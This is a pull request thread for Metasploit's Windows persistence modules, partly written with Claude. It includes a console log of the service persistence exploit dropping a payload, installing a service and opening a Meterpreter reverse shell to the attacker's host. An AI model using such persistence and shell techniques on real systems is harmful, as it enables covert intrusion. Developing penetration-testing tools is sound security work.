Persistence Module Updates (create_process, mkdir, attck)

[h00die]

Updates persistence modules to:

1. use create_process instead of cmd_exec
2. use mkdir/chmod with the Add cleanup toggle to file mixin mkdir method #21286 update
3. Add missing attck references

Claude assisted in generating this code

Verification

spot check using a few modules should be relatively straight forward.

windows/service looked to be one of the more complicated changes, so I ran it:

msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ajCCth.exe
[*] Attempting API method
[*] Install service: FIfRHIB (JcxIXLfYF)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (199238 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260525.3348/WIN10PROLICENSE_20260525.3348.rc
[*] Meterpreter session 3 opened (1.1.1.1:7781 -> 2.2.2.2:59357) at 2026-05-25 12:33:51 -0400

Also ran bits since its a more complicated change.

it was working, but then i did clear and lost it, so just trust me on this one 😉

[github-actions]

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We've added the additional-testing-required label to indicate that additional testing is required before this pull request can be merged.
For maintainers, this means visiting here.